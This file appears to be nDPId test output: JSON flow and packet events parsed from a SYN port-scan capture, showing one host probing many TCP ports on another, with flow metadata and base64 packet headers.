-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1880,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1870,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1880,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1870,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsaQQAAC0Gsm6sEAAIQA2GNIzTDvTdU4MZAAAAAGACCAAhmAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1881,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1871,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1881,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1871,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsWokAAC0GwOmsEAAIQA2GNIzTF+vdU4MZAAAAAGACCAAYoQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1882,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1872,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1882,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1872,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsA3wAAC0GF\/esEAAIQA2GNIzTB\/jdU4MZAAAAAGACCAAolAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1883,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1873,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1883,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1873,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAs5fgAACwGNnqsEAAIQA2GNIzTBizdU4MZAAAAAGACBAAuYAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1884,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1874,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1884,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1874,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAs2OsAADMGPIesEAAIQA2GNIzTIzPdU4MZAAAAAGACEAAFWQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1885,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1875,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1198,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1885,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1875,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsPK0AADcG1MWsEAAIQA2GNIzTBK7dU4MZAAAAAGACEAAj3gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1886,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1876,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1886,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1876,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAs7dgAADoGIJqsEAAIQA2GNIzTF6vdU4MZAAAAAGACDAAU4QAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1887,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1877,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1887,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1877,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAstjAAAC4GZEKsEAAIQA2GNIzTA4\/dU4MZAAAAAGACDAAo\/QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1888,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1878,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1888,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1878,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsdgUAADAGom2sEAAIQA2GNIzTB\/3dU4MZAAAAAGACBAAsjwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1889,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1879,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1889,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1879,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAscB4AACgGsFSsEAAIQA2GNIzTE8XdU4MZAAAAAGACBAAgxwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1890,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1880,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061212,"flow_last_seen":1278275061212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061212,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1890,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1880,"flow_packet_id":1,"flow_last_seen":1278275061212,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061212,"pkt":"ACYLMQczACWzv5HuCABFAAAsgvYAADYGj3ysEAAIQA2GNIzTBZrdU4MZAAAAAGACDAAm8gAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1891,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1881,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061212,"flow_last_seen":1278275061212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061212,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":63331,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1891,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1881,"flow_packet_id":1,"flow_last_seen":1278275061212,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061212,"pkt":"ACYLMQczACWzv5HuCABFAAAszC8AADYGRkOsEAAIQA2GNIzT92PdU4MZAAAAAGACDAA1KAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1892,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1882,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061213,"flow_last_seen":1278275061213,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061213,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1892,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1882,"flow_packet_id":1,"flow_last_seen":1278275061213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061213,"pkt":"ACYLMQczACWzv5HuCABFAAAsKEUAAC4G8i2sEAAIQA2GNIzTxNXdU4MZAAAAAGACDABntgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1893,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1883,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1236,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1893,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1883,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsDBEAACsGEWKsEAAIQA2GNIzTBNTdU4MZAAAAAGACEAAjuAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1894,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1884,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1894,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1884,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsbRQAACYGtV6sEAAIQA2GNIzTB9jdU4MZAAAAAGACDAAktAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1895,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1885,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1895,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1885,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsyTQAACUGWj6sEAAIQA2GNIzTBA7dU4MZAAAAAGACCAAsfgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1896,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1886,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1896,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1886,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsQj4AACwG2jSsEAAIQA2GNIzSAQPdUoMYAAAAAGACBAAzjAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1897,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1887,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10243,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1897,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1887,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsc\/gAACgGrHqsEAAIQA2GNIzSKAPdUoMYAAAAAGACBAAMjAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1898,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1888,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1898,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1888,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsTJkAAC0GztmsEAAIQA2GNIzSB\/HdUoMYAAAAAGACCAAongAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1899,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1889,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1899,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1889,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsUQEAAC4GyXGsEAAIQA2GNIzSFubdUoMYAAAAAGACDAAVqQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1900,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1890,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1900,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1890,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAstS4AAC4GZUSsEAAIQA2GNIzSH53dUoMYAAAAAGACDAAM8gAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1901,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1891,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1901,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1891,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsxqwAADsGRsasEAAIQA2GNIzSALPdUoMYAAAAAGACEAAn3AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1902,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1892,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1984,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1902,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1892,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsKv8AADkG5HOsEAAIQA2GNIzSB8DdUoMYAAAAAGACCAAozwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1903,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1893,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1903,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1893,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsR8wAAC0G06asEAAIQA2GNIzSJpXdUoMYAAAAAGACCAAJ+gAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1904,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1894,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":563,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 